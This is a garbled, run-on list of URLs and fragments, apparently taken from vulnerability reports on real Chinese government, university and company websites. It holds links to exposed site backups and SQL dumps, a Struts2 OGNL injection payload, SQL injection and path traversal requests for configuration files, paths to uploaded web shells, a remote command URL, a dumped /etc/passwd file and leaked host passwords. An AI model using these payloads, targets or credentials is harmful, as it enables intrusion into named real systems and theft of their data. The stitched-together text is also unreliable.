http://ny.xiangtan.gov.cn/123.rar http://www.jsrcgz.gov.cn/jsrcgz.rar http://www.xizangtiyu.gov.cn/xizangtiyu.gov.cn.rar http://www.xczj.gov.cn/xczj.rar http://www.lsgs.gov.cn/lsgs.gov.cn.rar http://xxgk.rizhao.gov.cn/xxgk.rar http://www.zjjjs.gov.cn/1.rar www.zjjjs.gov.cn http://www.xcagri.gov.cn/data.rar http://www.ptlc.gov.cn/123.rar http://www.gaoqing.gov.cn/gaoqing.rar http://www.tlepb.gov.cn/wwwroot.rar http://www.tlepb.gov.cn/tlepb.sql http://www.dgzsj.gov.cn/dgzsj.zip http://lyj.xtx.gov.cn/lyj.xtx.gov.cn.rar http://www.czfdc.gov.cn/1.rar http://slps.wsjd.gov.cn/1.zip http://xxgk.yn.gov.cn/xxgk.rar http://www.fldm.gov.cn/fldm.rar http://ggw.jxedu.gov.cn/ggw.tar.gz http://xqjy.lnjzedu.gov.cn/xqjy.zip http://zuopin.ciwong.com/ZuoPin/GetClickTopInformation http://zuowen.ciwong.com/yuwen/GetInfoListForHomePage http://60.213.185.51:9080/wscgs/reguser.do http://www.lcwscgs.com/wscgs/reguser.do http://60.211.179.22:9080/wscgs/reguser.do http://58.59.39.43:9080/wscgs/reguser.do http://cgs.qdpolice.gov.cn:9080/wscgs/reguser.do http://218.59.228.162/wscgs/reguser.do http://cgs.ytjj.gov.cn:9061/wscgs/reguser.do http://www.wfcgs.com:9080/wscgs/reguser.do http://www.wfcgs.com:9080/wscgs/reguser.do http://221.229.255.189:8183/guest/login.aspx http://mall.lakala.com/ http://www.jncdc.com/news_keshi_list.php?pid=312&key=* http://**.**.**/android/brxx.aspxbrid=1 http://60.2.228.70:8081/szyx/zzfw/login.jsp http://freshman.sctu.edu.cn:9900/szyx/zzfw/login.jsp http://218.196.240.184:9900/szyx/zzfw/login.jsp http://freshman.sctu.edu.cn:9900/szyx/zzfw/article_listbyid.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://jzlq.lakala.com:7070/pos/index.php?action=login http://51elearning.org.cn/ http://sso.51elearning.org.cn/sso/login.jsp http://sso.51elearning.org.cn/sso/login_10086.jsp http://sso.51elearning.org.cn/sso/portal/LoginAction.do?method=newRegister https://58.248.49.138 https://58.248.49.138/framework.do?ds=DS_RDCP_RUN_PAGE&page_code=XHP https://58.248.49.138则可以进入管理页面,拥有所有功能:可以对整个广州市联通的各个营业厅、销售订单、网点等进行管理,当然这不是我们的重点,接下来是要getshell https://58.248.49.138/uploadfile//temp/image/201501282041481.jsp https://58.248.49.138/cmd.jsp www.3721inn.com www.baotoo.com www.czslyydd.com www.maikr.com www.maitix.com www.piao.com.cn http://61.187.53.67:7000/download/download.php?file=../../config.inc.php http://blsj.cs0309.3g.qq.com/conf_simple/html/view.html?id=7 http://blsj.cs0309.3g.qq.com/conf_simple/html/ http://blsj.cs0309.3g.qq.com/conf_simple/html/view.html?id=7 http://gm.blmobile.3gqq.com/unit/gm/gm.html http://wap.yulin.gov.cn/a.zip http://www.dhjs.gov.cn/web.rar http://www.tezrsrc.gov.cn/tezrsrc.gov.cn.zip http://www.cqwshrss.gov.cn/cqwshrss.rar http://www.xcsr.gov.cn/xcsr.rar http://www.xingye.gov.cn/a.zip http://jilin.sbsm.gov.cn/jilin.zip http://school.hntax.gov.cn/hntax.zip http://jingxi.gov.cn/1.rar http://www.wlcbly.gov.cn/1.rar http://app.nanning.gov.cn/nanning.rar http://www.dyny.gov.cn/1.rar http://www.fjlyzfcg.gov.cn/web.rar http://www.dyqwj.gov.cn/dyqwj.rar http://info.xingtai.gov.cn/data.rar http://www.mlr.gov.cn/mlr.zip http://www.tzsb.gov.cn/www.rar http://jinrong.wangqing.gov.cn/jinrong.zip http://www.cqnagt.gov.cn/www.rar http://www.klxq.gov.cn/bbs.rar http://www.gxyldj.gov.cn/a.zip http://www.yc.gov.cn/1.rar http://www.bjlearning.gov.cn/bjlearning.sql http://www.yizheng.gov.cn/yizheng.zip http://www.wzta.gov.cn/data.rar http://zjtx.smeqd.gov.cn/zjtx.rar http://www.hndt.gov.cn/hndt.rar http://slps.wsjdzx.gov.cn/1.zip http://wgxj.maoming.gov.cn/web.rar http://guigang.gxta.gov.cn/新建文件夹.rar http://www.smeyl.gov.cn/smeyl.rar http://www.nmgsft.gov.cn/1.zip http://www.xthb.gov.cn/xthb.gov.cn.zip http://www.ylqts.gov.cn/a.zip http://www.cqybdj.gov.cn/www.rar http://www.gdgxs.gov.cn/gdgxs.gov.cn.rar http://www.luchuan.gov.cn/a.zip http://hdsww.bjhd.gov.cn/1.zip http://www.hl.jcy.gov.cn/备份.rar http://www.gzhbw.gov.cn/web.rar http://www.dongshandao.gov.cn/www.dongshandao.gov.cn.rar http://www.tcjgdj.gov.cn/www.tcjgdj.gov.cn.rar http://www.xunshan.gov.cn/xunshan.rar http://www.jn-ldjy.gov.cn/1.rar http://www.jxdjg.gov.cn/web.rar http://jianwei.ahsz.gov.cn/admin.rar http://www.bjyq.gov.cn/admin.rar http://www.zgdx.gov.cn/data.rar http://www.xtnyj.gov.cn/123.rar http://www.zbzzfdc.gov.cn/a.rar http://www.yxhrss.gov.cn/yxhrss.tar.gz http://sz315.gd315.gov.cn/web.rar http://www.zjqb.gov.cn/bak.rar http://jjw.ahq.gov.cn/wwwroot.zip http://www.sysrs.gov.cn/wwwroot.rar http://www.lysrd.gov.cn/web.rar http://www.gxbobai.gov.cn/a.zip http://www.wzmz.gov.cn/wzmz.rar http://wsxf.jx-xinfang.gov.cn/新建文件夹.rar http://www.zjkqd.gov.cn/zjkqd.rar http://www.yzcb.gov.cn/yzcb.rar http://jxw.shiyan.gov.cn/1.rar http://tougao.pacq.gov.cn/wwwroot.rar www.pacq.gov.cn http://www.beiliu.gov.cn/a.zip http://www.dysq.gov.cn/bbs.rar http://www.hebfzb.gov.cn/web.zip http://www.nxwzga.gov.cn/nxwzga.rar http://mzj.dongshandao.gov.cn/mzj.dongshandao.gov.cn.rar http://www.wulanchabu.gov.cn/1.rar http://www.jzdaj.gov.cn/1.zip http://www.zdgs.gov.cn/admin.rar http://wtj.dongshanisland.gov.cn/wtj.dongshanisland.gov.cn.rar http://gaj.jiande.gov.cn/gaj.rar http://www.jzzx.gov.cn/1.rar http://www.dyhtz.gov.cn/data.rar http://www.czfcj.gov.cn/admin.rar http://tieba.wangqing.gov.cn/wangqing.zip http://www.hflib.gov.cn/hflib.rar http://gymlr.gov.cn/wwwroot.rar http://www.jsmzw.gov.cn/jsmzw.gov.cn.rar http://www.lhczj.gov.cn/web.rar http://www.hbjzga.gov.cn/1.tar.gz http://www.ylyz.gov.cn/a.zip http://tour.hnsn.gov.cn/tour.rar http://sshg.xiangtan.gov.cn/123.rar http://gh.wdci.gov.cn/gh.rar http://www.haedu.gov.cn/11.rar http://jyj.ningbo.gov.cn/1.rar http://www.rxzf.gov.cn/a.zip http://www.wandafilm.com/ http://www.wandafilm.com/get_pass/get_pass.jsp http://www.wandafilm.com/common/login.jsp http://weixin.zjol.com.cn/ http://weixin.zjol.com.cn/weixin/pages/ZjolMembers/list.do http://www.fescovip.com/giftcard/login.aspx www.hxyz.com.cn:81 www.nj29jt.net:88 cn:8080 cn:8080 www.mdsz.com.cn:8080 www.dfzx.net.cn www.tyjsw.net jdbc:sqlserver://127.0.0.1:1433;databaseName=xiaoxiaoyong_school jdbc:sqlserver://127.0.0.1:1433;databaseName=master http://125.39.241.166:8080/cgi/ http://125.39.241.166:8080/cgi/cgi.zip http://125.39.241.166:8080/cgi/cgi-bin/unistat.sh?date=20150127 http://qqcgi.82696.com:8080/cgi/cgi-bin/unipay.sh?date=20150128&qq=1854000000 http://www0.ceair.com/muecard/pages/system/login/login.jsp http://app.fashion.ifeng.com/luxury/read/getData.php?letter=E http://app.fashion.ifeng.com/luxury/read/getData.php?letter=E http://app.fashion.ifeng.com/luxury/read/getData.php?letter=E http://123.151.12.139/apple/index/?templates=0&type=all&user=&sDate1=2015-01-05'&sDate2=2015-01-28'&op=1 http://zone.wooyun.org/content/16772可以轻松绕过,多看zone,及时加规则呀 http://123.151.12.139/apple/index/?templates=0&type=all&user=&sDate1=2015-01-05%27&sDate2=2015-01-28%27&op=\Nunion%20select%201,2,3,4,5,user,password,\Nfrom%20mysql.user%20--%20 http://123.151.12.139/apple/strategydetail?general_id=77 https://passport.ceair.com/cas/login?service=http%3A%2F%2Fwww.ceair.com%2Fj_spring_cas_security_check http://www.fcchbj.com/login http://www.jswenhui.com/login http://bticec.mypiao.com/login http://www.tianchan.com/index?type=direct http://www.qtconcerthall.com/ http://login.zhongjiu.cn/login.zhongjiu.cn.zip http://*.*.*.*:*/manager/html http://202.38.232.118:8080/manager/html inurl:/poweb/ http://p-cloud.zsodl.cn:8080/manager/html http://162.105.138.156/manager/html http://202.107.224.20:8080/manager/html http://202.197.107.11:8080/manager/html http://202.114.65.185/manager/html http://210.32.33.245:8080/manager/html http://res.sdju.edu.cn:8000/manager/html http://202.38.232.118:8080/manager/html http://222.29.253.58:8080/manager/html http://202.194.184.2:8020/manager/html http://202.197.69.15:8080/manager/html http://218.58.59.71:7272/manager/html http://210.44.126.14:8080/manager/html http://lib.zust.edu.cn:8080/manager/html http://116.13.7.80:8881/manager/html http://218.192.55.9/manager/html http://219.222.177.236:8080/manager/html http://219.246.131.9:8080/manager/html http://211.67.126.11:8088/manager/html http://211.67.182.137:8080/manager/html http://lib.sdwm.cn:9999/manager/html http://60.214.233.173:8080/manager/html http://bwss.nlic.net.cn:8080/manager/html http://202.113.140.10:8080/manager/html http://59.74.114.252:84/manager/html http://219.134.93.106:8080/login/login.jsp http://219.134.93.106:8080/login/logon.action http://mail.cmaritime.com.cn/extman/cgi/index.cgi http://demo.xdcms.cn/index.php?m=member&f=edit_save http://demo.xdcms.cn/index.php?m=member&f=register_save http://joinme.ztems.com/,我们测试的安卓版本为最新版2.1.66.3224,百度搜索显示下载量已有86万,不知中兴手机是否内置该应用。 http://www.ccfc.zju.edu.cn/ad8min/ http://www.ccfc.zju.edu.cn/uploads/y.php http://zq.17173.com/dn/joinskill/skilladd.php http://ly.db.17173.com/items.php?l1=31-40&q1=2&m1=2&lo1=4&x=47&y=14 http://rl.mcdonalds.com.cn/rl/index.php这样的话就能访问正常。 http://fsit.net/com.asp?t=0&s=0&i=1 http://60.28.2.131:8088/ http://60.28.2.131:7080/login.php url:https://vpn.airchinaf.com/prx/000/http/localhost/login http://wooyun.org/bugs/wooyun-2014-076218 http://tijian.jiankang.cn/ http://www.fescovip.com/benefit/buy001.aspx http://www.gzpg.com.cn/bookshop/pagelayout!input.action http://202.205.91.50:8080/xiaoyou/User_userLogin.do http://www.bjszj.gov.cn/zfbz/sousuo.asp http://m.zhongjiu.cn/ http://m.zhongjiu.cn/Address/AddressInfoPage/321921 http://www.wh.sdu.edu.cn/admin/login.jsp http://59.151.113.213/WEB-INF/web.xml http://59.151.113.213/WEB-INF/spring/webmvc-config.xml http://59.151.113.213/WEB-INF/freemarker/layouts/component.xml http://59.151.113.213/WEB-INF/freemarker/layouts/layouts.xml http://59.151.113.240/WEB-INF/web.xml http://www.kanglesoft.com/utility/convert/data/1.php http://www.kanglesoft.com/utility/convert/data/config.inc.php http://www.ymt360.com/ http://m.ymt360.com/ http://wljx.whsw.cn/public_download.jsp http://cnc.jinri.cn/Ajax/WebRequestHandler.ashx?linkURL=Airlines&ico=HU http://front.sb.huhoo.com/index/process_view/?id=72 coding:utf-8 URL:http://sxyq.hrss.gov.cn/list.php?menuid=69&departmentid=2 http://www.sxyq.hrss.gov.cn/Bbs/ssbb.php http://js.job.12580.com/news/admincp.php http://61.191.18.133/kfb/NewContent.aspx?pkid=104%E2%80%99 http://61.191.18.133/kfb/NewContent.aspx?pkid=104 android:label="Youku android:name="com.youku.service.push.StartActivityService android:exported="true http://dynamic.help.xunlei.com:8081/online?method=updatebrowsecount&productid=00124&questionid=2012090714253519163 http://www.xggxq.gov.cn/cont.asp?id=253 http://www.xgwsqwly.gov.cn/show.asp?ID=304 http://61.146.92.242/EMP/SubModule/Login/index.aspx http://cms.weather.com.cn/cms/dbtest2.jsp http://211.137.251.231/ http://admin.ebelter.com/ http://zlvod.pipi.cn/.svn/entries http://www.sonkwo.com/search?utf8=%E2%9C%93&q=img+src&button= http://em.sjtu.edu.cn/displaynote.asp?id=310 http://www.pdszygz.com/class.asp?classid=149 http://www.pdsdxscg.cn.pdswzjs.com/class.asp?classid=151 http://www.pdsfgw.gov.cn/class.asp?classid=141 www.xxoo.com/admin/admin_login.asp,admin都爆出来了我就不继续深入了,强烈要求转交CNVD+上首页 http://www.wooyun.org/bugs/wooyun-2015-093990/trace/837f75b8f5e93d5d7afd6097b7d50323 http://www.wooyun.org/bugs/wooyun-2015-094120/trace/dced55236ac48daf075cbc5728c732f7 http://www.wooyun.org/bugs/wooyun-2015-094142/trace/687803614e3ca4c980ba7dfea9cf1546 http://www.wooyun.org/bugs/wooyun-2015-094159/trace/d6b23ca521fcdc072c118edbf51a4f08 http://www.wooyun.org/bugs/wooyun-2015-094167/trace/77c7934aa156216264162658e7803489 http://www.wooyun.org/bugs/wooyun-2015-094338/trace/cf5cd42856a4f03eab40481e01fe7efa http://www.wooyun.org/bugs/wooyun-2015-094340/trace/86501f81f553610550dabf579525bd2b http://www.wooyun.org/bugs/wooyun-2015-094429/trace/53b566c7e175f13c94d7aefe724e6e54 http://www.wooyun.org/bugs/wooyun-2015-094589/trace/139337aae0d274d3cfab5467b97dc644 http://www.zjedu.net http://220.181.154.150:8080 http://price.xcar.com.cn/serise8/city9999-1-1.htm?pop=open&is_cms=15&mid=11275 http://www.shenguang.com/RZRQ2/time.aspx?t=SH&order=desc&Column=StockName&time=2015-01-27 http://mf.travelsky.com/xmb2b/managerlogin.do http://et.xiamenair.com.cn/xmb2b/b2blogin.do http://xyh.njue.edu.cn/admin/ http://store.hotel.tdxinfo.com/tops-front-purchaser-hotel/pur/order/hotel/orderView http://jda.cq.gov.cn/cqdaglyb/FrontUI/AddComment.aspx?strurl=yy http://119.188.6.230:8989/ http://116.228.55.205/www.rar http://qchat.tdtchina.cn/nmrm/login.action http://**.**.**/ http://psy.ruc.edu.cn/faculty.php?sortid=3 http://119.188.254.18:8080/ http://**.**.**/indexx.aspx http://61.164.120.131/Login.aspx www.wzcc.com http://oa.wzcc.com/WebService/SMS.asmx"/ http://pxglbbs.wzcc.com/"/ http://acc.jxf.gov.cn/QuerryAll/GetContinue.aspx http://sqlmap.org http://tuan.ly.com/tuan/Handler/TuanDetailAjaxHandler.ashx?method=GetUserGrade&groupbuyid=654708&iid=0.7009963680917772 http://www.nongyou.com.cn/ http://221.2.171.59:8000/rushanview.aspx?id=288&newsid=1299&deptid=55 http://222.135.127.190:7000/rushanview.aspx?id=288&newsid=1299&deptid=55 http://221.2.149.47:8100/rushanview.aspx?id=288&newsid=1299&deptid=55 http://222.135.109.70:8100/rushanview.aspx?id=288&newsid=1299&deptid=55 http://221.2.171.59:8000/rushanview.aspx?id=288&newsid=1299&deptid=55 http://222.135.127.190:7000/rushanview.aspx?id=288&newsid=1299&deptid=55 http://61.133.119.187:8089/rushanview.aspx?id=288&newsid=1299&deptid=55 http://61.133.119.187:8089/rushanview.aspx?id=288&newsid=1299&deptid=55 http://222.135.127.190:7000/rushanview.aspx?id=288&newsid=1299&deptid=55 www.55.la http://124.238.218.78/ inurl:gqlist.aspx?deptid= http://221.2.171.59:8000/gqlist.aspx?deptid=50&id=289 http://222.135.109.70:8100/gqlist.aspx?deptid=51&id=286 http://61.133.119.187:8089/gqlist.aspx?deptid=51&id=284 http://222.135.127.190:7000/gqlist.aspx?deptid=55&id=286 http://221.2.149.47:8100/gqlist.aspx?deptid=58&id=285 http://60.217.72.17:8000/gqlist.aspx?deptid=51&id=245 http://wutongyu.info/uxss.html触发,看上图,已经成功跨域了。 url:http://60.173.176.29:7001/defaultroot/login.jsp?localeCode=zh_CN https://passport.souyidai.com/password/findpassword http://www.pengpengmall.com/ http://192.168.1.1/tmp/dhcpd.leases http://tcl.com/Public http://oa.king.tcl.com/login.aspx http://ggzy.neijiang.gov.cn/ http://ggzy.neijiang.gov.cn/gbook/ http://www.zhcall.com/zhcall.rar http://xiaoyuan.lefeng.com/WEB-INF/web.xml http://xiaoyuan.lefeng.com/WEB-INF/classes/applicationContext.xml http://xiaoyuan.lefeng.com/WEB-INF/classes/application.properties http://spark.tencent.com/ http://www.nongyou.com.cn/ http://222.135.109.70:8100/wendengview.aspx?deptid=54&atid=291 http://61.133.119.187:8089/wendengview.aspx?deptid=54&atid=291 http://222.135.127.190:7000/wendengview.aspx?deptid=54&atid=291 http://221.2.171.59:8000/wendengview.aspx?deptid=54&atid=291 http://221.2.156.181:8100/wendengview.aspx?deptid=54&atid=291 http://221.2.149.47:8100/wendengview.aspx?deptid=54&atid=291 http://222.135.127.190:7000/wendengview.aspx?deptid=54&atid=291 http://222.135.127.190:7000/wendengview.aspx?deptid=54&atid=291 http://221.2.149.47:8100/wendengview.aspx?deptid=54&atid=291 http://onair.cdvcloud.com/ http://onair.cdvcloud.com/download/data/?path=../WEB-INF/web.xml http://onair.cdvcloud.com/download/data/?path=../WEB-INF/classes/applicationContext.xml classpath:email.properties classpath:jdbc.properties http://onair.cdvcloud.com/download/data/?path=../WEB-INF/classes/jdbc.properties http://onair.cdvcloud.com/download/data/?path=../WEB-INF/classes/email.properties http://www.lwsyy.com/yuyuec/LY_Edit.asp?id=11699 http://www.lwsyy.com/yuyuec/LY_Edit.asp?id=11699 http://www.lwsyy.com/yuyuec/admin/Admin_Login.asp http://www.lwsyy.com/yuyuec/sea.asp http://weiyun.tmt.tcl.com/ http://weiyun.tmt.tcl.com/basic/usermanager/sysOrgUser/login post:fdName=test&fdPws=test http://www.nongyou.com.cn/ http://221.2.149.47:8100/neiye.aspx?id=246 http://222.135.109.70:8100/neiye.aspx?id=246 http://61.133.119.187:8089/neiye.aspx?id=246 http://222.135.127.190:7000/neiye.aspx?id=246 http://221.2.171.59:8000/neiye.aspx?id=246 http://222.135.109.70:8100/neiye.aspx?id=246 http://221.2.156.181:8100/neiye.aspx?id=246 http://221.2.156.181:8100/neiye.aspx?id=246 http://222.135.109.70:8100/neiye.aspx?id=246 http://221.2.171.59:8000/neiye.aspx?id=246 http://www.phei.com.cn/module/zygl/manager/uploadpic.jsp?option=upload http://www.phei.com.cn/module/zygl/manager/uploadfiles/Browser.jsp http://www.zlqh.com/ http://www.zlqh.com/zlqhbackground/login.php http://crm.byd.com.cn/login.jsp http://crm.byd.com.cn/login!checkUserFront.action http://sms.517na.com/SMSLogin.aspx http://www.517na.com注册一个,这里不麻烦了,直接用这个洞爆破的一个账号 sms.517na.com/Pay/SMFillMoney.aspx www.zyzj.gov.cn http://vmi.tclking.com/ http://59.33.249.46/Default.aspx http://www.jilinnongye.com/吉林农业 http://www.jtnsh.com/吉林九台农村商业银行 http://www.jilinnongye.com/ewebeditor/hack.php http://www.jtnsh.com/1.php http://www.nongyou.com.cn/ http://222.135.127.190:7000/Swgk/Default.aspx?st=1&deptid=52 http://221.2.171.59:8000/Swgk/Default.aspx?st=1&deptid=52 http://222.135.109.70:8100/Swgk/Default.aspx?st=1&deptid=52 http://61.133.119.187:8089/Swgk/Default.aspx?st=1&deptid=52 http://221.2.156.181:8100//Swgk/Default.aspx?st=1&deptid=52 http://221.2.149.47:8100/Swgk/Default.aspx?st=1&deptid=52 http://222.135.127.190:7000/Swgk/Default.aspx?st=1&deptid=52 http://222.135.127.190:7000/Swgk/Default.aspx?st=1&deptid=52 http://221.2.149.47:8100/Swgk/Default.aspx?st=1&deptid=52 http://fczx.lfmz.gov.cn/index.html https://elearning.bankcomm.com/?r=site/login http://www.glxy.chinamobile.com http://www.zjwhgx.cn/News.aspx?Key=xxx http://www.zjwhgx.cn/ckfinder/ckfinder.html http://mobile.cnooc.com.cn inurl:wendenglist.aspx?deptid= http://221.2.171.59:8000/wendenglist.aspx?deptid=50&id=220 http://61.133.119.187:8089/wendenglist.aspx?deptid=51&id=221 http://222.135.109.70:8100/wendenglist.aspx?deptid=57&id=222 http://222.135.127.190:7000/wendenglist.aspx?deptid=55&id=223 http://221.2.149.47:8100/wendenglist.aspx?deptid=59&id=220 http://60.217.72.17:8000/wendenglist.aspx?deptid=58&id=221 http://www.zg.gov.cn/NewsList.aspx?RegionId=B0&CataId=62002&CataId2=04 http://highlights.paper.edu.cn/search_section.php?year=2013&qi=6 http://jpkc.hfut.edu.cn/jpkc2004/2004/theme_list2.php?sub_id=11 http://lgb.hfut.edu.cn/show_news.php?news_id=143 http://zichan.hfut.edu.cn/second.php?c_id=7 http://ca.hfut.edu.cn/soc_news_detail.php?id=291 http://geopw.whu.edu.cn:8080/axis2/axis2-admin/ http://geopw.whu.edu.cn:8080/axis2/services/Cat/exec?cmd=whoami http://passport.joycp.com/ http://passport.joycp.com/ajax/login.ashx?username=xxx&pwd=xxx&vcode=&jsonp=JoyCp.Login.Result&rnd=0.3753943075351882 http://xzsp.moa.gov.cn/ http://www.px.sdu.edu.cn/manage/login.jsp http://60.214.69.81 http://60.217.236.240/User# http://rrt.cer.com.cn/ http://rrt.cer.com.cn/schoolspace.php?orgcode=0000000000 https://ticket.wuhan.wandamoviepark.com/Choose/ChooseTicket http://kf.bestpay.com.cn http://kf.bestpay.com.cn/zhij/imsystem/im/im_client.jsp?queueId=1011&guestId=&sessionId=&keyword= http://kf.bestpay.com.cn/zhij/imsystem/download.jsp?&msgDirection=1&path=20150129113305618_1.jsp&realFileName=1.jsp http://kf.bestpay.com.cn/zhij/imsystem/download.jsp?&msgDirection=1&path=/../../download.jsp&realFileName=1.jsp http://kf.bestpay.com.cn/zhij/imsystem/sendfile/client/20150129113305618_1.jsp root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin webapp:x:501:501::/home/webapp:/bin/bash kefu_remote:x:502:10::/home/kefu_remote:/bin/bash fengkong:x:503:505::/webapp/tykf2/upload/fengkong:/sbin/nologin http://172.16.248.128:8080 http://www.hebijj.gov.cn/cgs/main/index http://px.xmrc.com.cn/lecturerAction!indexFind.action http://contest.ceair.com:8020/ http://iwatchome.tom.com/Wiki_style.php?w2_id=261 http://www.strongsoft.net/ http://219.159.239.96:8088/为例,在后台测试中发现如下操作无需登录即可进行: http://lolnewbf.178.com/person/index?server=卡拉曼达&name=262120442222 http://www.nongyou.com.cn/ http://221.2.156.181:8100/jubao/ProblemsWarning.aspx?pid=1 http://221.2.171.59:8000/jubao/ProblemsWarning.aspx?pid=1 http://222.135.76.147:8100/jubao/ProblemsWarning.aspx?pid=1 http://222.135.109.70:8100/jubao/SProblemsWarning.aspx?pid=1 http://61.133.119.187:8089/jubao/ProblemsWarning.aspx?pid=1 http://60.217.72.17:8000/jubao/ProblemsWarning.aspx?pid=1 http://111.17.169.210:801/jubao/ProblemsWarning.aspx?pid=1 http://221.2.171.59:8000/jubao/ProblemsWarning.aspx?pid=1 http://222.135.76.147:8100/jubao/ProblemsWarning.aspx?pid=1 http://ggfw.lfmz.gov.cn/index.html http://news.damai.cn/FrontNewsAdmin/NewsContentAction.do?labelName=注入参数&newsId=272&number=4&_action=getRelatedNews http://news.damai.cn/FrontNewsAdmin/NewsContentAction.do?labelName= https://mail.travelsky.com/ https://122.119.255.79/por/login_psw.csp www.financecenter https://**.**.** http://**.**.**/login.jsp http://**.**.**/denglu.aspurl1=15_ http://**.**.**/caci/admin/login.jsp_ http://**.**.**/LogIn.aspx_ https://**.**.**/TecAlert/_ http://202.100.228.122:8080/rdom/login.jsp_ http://**.**.**/lbsp_service/services/AxisWebServiceEntryService/callAxisServiceparamList= http://**.**.**/svn/document2014/ProjDoc/laputa/20工程/20.50测试/需替换的配置文件_ http://**.**.** http://**.**.** http://**.**.** http://**.**.**/caci/admin/login.jsp VM-VMW1292-OA:ap3che VM-VMW1292-OA:oadevelop VM-VMW1292-OA:123456 TRAVELSKY-OP:Zhouyi17 VM-VMW190-APP:Dell519Server http://60.28.205.38:8080/ur/reflect/userReflectCheckNew.jsp http://60.28.205.38:8080/ur/reflect/userReflectCheckNew.jsp.bak http://city2012.house.sina.com.cn/?ctrl=personal&uid=1276151065%20UNION%20ALL%20SELECT%200,1,2,3,4,5,6,7,8,CONCAT%280x5e5e5e,user%28%29,0x5e5e5e%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# http://m.aili.com/index.php?c=wap&m=archive&a=index&channel=auto&column=qichexinshi&aid=819248 http://xinpan.zzhz.zjol.com.cn/zjol/newhouse/admin/Admin_login.html http://www.gdzjepb.gov.cn/business/apply.php?action=edit&id=15 URL:/servlet/attachemntFileServlet?attId=EPzWPdhg&method=delReplyFile cn:8080/servlet/attachemntFileServlet?attId=EPzWPdhg&method=delReplyFile http://egov.pzhzw.gov.cn:8080/servlet/attachemntFileServlet?attId=EPzWPdhg&method=delReplyFile http://egov.scsn.gov.cn:8080/servlet/attachemntFileServlet?attId=EPzWPdhg&method=delReplyFile http://egov.zgzw.gov.cn:8080/servlet/attachemntFileServlet?attId=EPzWPdhg&method=delReplyFile http://stgov.my.gov.cn:8080/servlet/attachemntFileServlet?attId=EPzWPdhg&method=delReplyFile URL:/servlet/questerOffLineServlet?id=QUkOLz0c&method=findQuesterOffLineMsgInfo&state=read cn:8080/servlet/questerOffLineServlet?id=QUkOLz0c&method=findQuesterOffLineMsgInfo&state=read cn:8080/servlet/questerOffLineServlet?id=QUkOLz0c&method=findQuesterOffLineMsgInfo&state=read http://egov.pzhzw.gov.cn:8080/servlet/questerOffLineServlet?id=QUkOLz0c&method=findQuesterOffLineMsgInfo&state=read http://egov.pzhzw.gov.cn:8080/servlet/questerOffLineServlet?id=QUkOLz0c&method=findQuesterOffLineMsgInfo&state=read http://dy.show.sina.com.cn/getnew.php http://tel6.53kf.com/external.php?controller=web&style=70816065-4000290058-103764652 http://cts.tcl.com/images/help.aspx http://cts.tcl.com/images/2.asp http://bme.sjtu.edu.cn/indexnew.aspx?TID=1 http://bme.sjtu.edu.cn/indexnew_show.aspx?NID=367&TID=1 http://bme.sjtu.edu.cn/indexpage_pic.aspx?TID=1 http://bme.sjtu.edu.cn/new.aspx?TID=4&TID2=37 http://bme.sjtu.edu.cn/pagetypeurl.aspx?TID=1 http://bme.sjtu.edu.cn/page_pic.aspx?TID=2&TID2=25&TID3=68 http://bme.sjtu.edu.cn/new_show.aspx?NID=51&TID=1&TID2=37&TID3=0 http://180.166.69.84:8886/zhij/imsystem/im/im_client.jsp?queueId=1011&guestId=&sessionId=&keyword= http://180.166.69.84:8886/zhij/imsystem/download.jsp?&msgDirection=1&path=20150129113305618_1.jsp&realFileName=1.jsp http://180.166.69.84:8886/zhij/imsystem/download.jsp?&msgDirection=1&path=/../../download.jsp&realFileName=1.jsp http://180.166.69.84:8886/zhij/imsystem/sendfile/client/20150129113305618_1.jsp http://mjzz.lfmz.gov.cn/ http://www.hzlib.net/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../../../ http://www.sxmu.edu.cn/zyc/UploadFiles/2015127181136748.cer http://www.bynrzfcg.cn/articleWeb!view.action http://www.webcet.cn/ https://github.com/javaxiaomangren/amap-data-cp/blob/d3924a1765eb1e3d635338962c621fbd60e34223/amap-data-cp-theater/src/main/resources/matrix.properties 